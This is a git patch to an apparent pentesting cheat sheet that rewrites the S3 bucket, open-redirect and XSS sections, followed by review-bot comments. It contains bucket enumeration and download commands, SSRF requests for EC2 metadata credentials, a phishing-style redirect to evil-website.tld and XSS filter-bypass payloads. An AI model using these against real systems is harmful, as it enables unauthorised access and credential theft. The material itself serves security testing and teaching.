From 8b39647de6886a79fbb44aa091700d9c0359ffb1 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sat, 29 Dec 2018 13:05:29 +0100 Subject: [PATCH] AWS S3 and Open redirect rewritten --- AWS Amazon Bucket S3/README.md | 81 +++++++++++++++++++++------------- Open redirect/README.md | 40 ++++++++++++++++- XSS injection/README.md | 8 ++++ 3 files changed, 97 insertions(+), 32 deletions(-) diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 34625a063c..17a1a5e5d5 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md 
@@ -1,9 +1,47 @@ # Amazon Bucket S3 AWS +## Summary + +- [Tools](#tools) +- [AWS Configuration](#aws-configuration) +- [Open Bucket](#open-bucket) +- [Basic tests](#basic-tests) + - [Listing files](#listing-files) + - [Move a file into the bucket](move-a-file-into-the-bucket) + - [Download every things](#download-every-things) + - [Check bucket disk size](#check-bucket-disk-size) +- [AWS - Extract Backup](#aws---extract-backup) +- [Bucket juicy data](#bucket-juicy-data) + ## Tools - [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu) - +- [Bucket Finder - Search for readable buckets and list all the files in them](https://digi.ninja/) + ```powershell + wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 + ./bucket_finder.rb my_words + ./bucket_finder.rb --region ie my_words + US Standard = http://s3.amazonaws.com + Ireland = http://s3-eu-west-1.amazonaws.com + Northern California = http://s3-us-west-1.amazonaws.com + Singapore = http://s3-ap-southeast-1.amazonaws.com + Tokyo = http://s3-ap-northeast-1.amazonaws.com + + ./bucket_finder.rb --download --region ie my_words + ./bucket_finder.rb --log-file bucket.out my_words + ``` +- [Boto3 - Amazon Web Services (AWS) SDK for Python](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) + ```python + import boto3 + # Create an S3 client + s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1') + + try: + result = s3.list_buckets() + print(result) + except Exception as e: + print(e + ``` ## AWS Configuration @@ -61,7 +99,9 @@ http://example.com/resources/id%C0 eg: http://redacted/avatar/123%C0 ``` -## Basic test - Listing the files +## Basic tests + +### Listing files ```bash aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here 
@@ -80,7 +120,7 @@ Non-authoritative answer: 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com. ``` -## Move a file into the bucket +### Move a file into the bucket ```bash aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read @@ -95,13 +135,15 @@ aws s3 mv test.txt s3://hackerone.files SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt" ``` -## Download every things (in an open bucket) +### Download every things ```powershell aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2 ``` -## Check bucket disk size (authenticated) use, --no-sign for un-authenticated +### Check bucket disk size + +Use `--no-sign` for un-authenticated check. ```powershell aws s3 ls s3:// --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}' @@ -128,7 +170,7 @@ sudo file -s /dev/xvda1 sudo mount /dev/xvda1 /mnt ``` -## Bucket informations +## Bucket juicy data Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting : 
@@ -141,35 +183,12 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ -## Bucket Finder - -A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files. -```powershell -wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 -./bucket_finder.rb my_words -./bucket_finder.rb --region ie my_words - US Standard = http://s3.amazonaws.com - Ireland = http://s3-eu-west-1.amazonaws.com - Northern California = http://s3-us-west-1.amazonaws.com - Singapore = http://s3-ap-southeast-1.amazonaws.com - Tokyo = http://s3-ap-northeast-1.amazonaws.com - -./bucket_finder.rb --download --region ie my_words -./bucket_finder.rb --log-file bucket.out my_words -``` - -Use a custom wordlist for the bucket finder, can be created with - -```powershell -List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media. -List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart. 
-``` ## References -* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets -* https://digi.ninja/projects/bucket_finder.php +* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets) * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) +* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) diff --git a/Open redirect/README.md b/Open redirect/README.md index 36300046ae..80556da662 100644 --- a/Open redirect/README.md +++ b/Open redirect/README.md 
@@ -2,6 +2,43 @@ > Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. +## Summary + +- [Exploitation](#exploitation) +- [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx) +- [Fuzzing](#fuzzing) +- [Filter Bypass](#filter-bypass) +- [Common injection parameters](#common-injection-parameters) +- [References](#references) + +## Exploitation + +Let’s say there’s a `well known` website - https://famous-website.tld/. And let's assume that there's a link like : + +```powershell +https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account +``` +After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL. +What happens if we change the `famous-website.tld/account` to `evil-website.tld`? + +```powerhshell +https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account +``` + +By visiting this url, if we get redirected to `evil-website.tld` after the signup, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials. 
+ + +## HTTP Redirection Status Code - 3xx + +- [300 Multiple Choices](https://httpstatuses.com/300) +- [301 Moved Permanently](https://httpstatuses.com/301) +- [302 Found](https://httpstatuses.com/302) +- [303 See Other](https://httpstatuses.com/303) +- [304 Not Modified](https://httpstatuses.com/304) +- [305 Use Proxy](https://httpstatuses.com/305) +- [307 Temporary Redirect](https://httpstatuses.com/307) +- [308 Permanent Redirect](https://httpstatuses.com/308) + ## Fuzzing Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case @@ -12,7 +49,7 @@ To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your t WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt ``` -## Exploitation +## Filter Bypass Using a whitelisted domain or keyword @@ -131,3 +168,4 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) +* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/) \ No newline at end of file diff --git a/XSS injection/README.md b/XSS injection/README.md index be82a3c094..781975e03e 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md 
@@ -564,6 +564,14 @@ content['alert'](6) [12].forEach(alert); ``` +Bypass using an alternate way to execute an alert - [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) +```javascript +prompt`${document.domain}` +document.location='java\tscript:alert(1)' +document.location='java\rscript:alert(1)' +document.location='java\tscript:alert(1)' +``` + Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464) ```javascript
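Review bot: in `AWS Amazon Bucket S3/README.md` hunk `@@ -1,9 +1,47 @@`, the Boto3 snippet ends with `print(e` and will not parse; close the call as `print(e)`. In the same hunk the Summary entry `[Move a file into the bucket](move-a-file-into-the-bucket)` is missing the leading `#`, so it links to a relative path instead of the heading while every other entry uses `#...`. The Bucket Finder block also jumps from `wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 ...` straight to `./bucket_finder.rb my_words` without extracting the archive (`tar xjf bucket_finder_1.1.tar.bz2`) and changing into the extracted directory, and its fence is tagged `powershell` although the commands are a Unix shell session; `bash` would be the accurate tag, here and for the other `powershell` fences in this file.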
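Review bot: in `AWS Amazon Bucket S3/README.md` hunk `@@ -95,13 +135,15 @@`, the new sentence `Use --no-sign for un-authenticated check.` names an option the AWS CLI does not have; the flag is `--no-sign-request`, which the `aws s3 sync ... --no-sign-request --region us-west-2` command a few lines earlier in the same hunk already uses. The renamed heading `### Download every things` also carries over the grammar error from the old heading; `### Download everything` reads correctly, with the Summary anchor changed to `#download-everything` to match.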
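Review bot: in `AWS Amazon Bucket S3/README.md` hunk `@@ -128,7 +170,7 @@`, the new heading `## Bucket juicy data` does not describe the section under it: the context line says it is about the EC2 instance metadata service (`169.254.169.254`) reached through an SSRF, not about bucket contents. A heading such as `## EC2 instance metadata via SSRF` would match the text, and the Summary entry `[Bucket juicy data](#bucket-juicy-data)` added in the first hunk would need to change with it.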
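Review bot: in `AWS Amazon Bucket S3/README.md` hunk `@@ -141,35 +183,12 @@`, moving the Bucket Finder usage up into Tools is fine, but the wordlist guidance is dropped rather than moved: the two removed lines describing Fortune1000 and Alexa permutations (`walmart, walmart.com, walmart-backup, walmart-media`) are what `my_words` is supposed to contain, so keep them next to the Bucket Finder entry. The same hunk removes `https://digi.ninja/projects/bucket_finder.php` from References while the new Tools entry links only to `https://digi.ninja/`; point the Tools link at the project page instead.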
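Review bot: in `Open redirect/README.md` hunk `@@ -2,6 +2,43 @@`, the second code fence's language tag is spelled `powerhshell`, so renderers will not recognise it; both fences only wrap URLs, so `powershell` is a misleading tag either way and a plain fence would do. In the new `## HTTP Redirection Status Code - 3xx` list, `304 Not Modified` is a cache validation response that never carries a `Location` header and cannot redirect anywhere, and `305 Use Proxy` is deprecated and ignored by browsers; for an open redirect cheat sheet the codes that matter are 301, 302, 303, 307 and 308, so either trim the list or mark which entries actually redirect.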
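Review bot: in `Open redirect/README.md` hunk `@@ -131,3 +168,4 @@`, the added s0cket7 reference leaves the file with `\ No newline at end of file`; add the trailing newline so the next append does not produce a noisy diff. The date in that entry (`AUGUST 15, 2018`) is also in all caps, unlike the `Mar 27, 2013` style used for the Rapid7 entry added in the AWS References hunk of this same patch.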
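Review bot: in `XSS injection/README.md` hunk `@@ -564,6 +564,14 @@`, the first and last `document.location='java\tscript:alert(1)'` lines are identical; drop the duplicate or replace one with the separator that was actually intended (the credited tweet is the place to check). A short note that the `\t` and `\r` escapes are resolved by the JavaScript string literal, so the string handed to the navigation contains a real tab or carriage return inside the scheme that the URL parser then strips, would tell the reader why these variants get past a `javascript:` keyword filter.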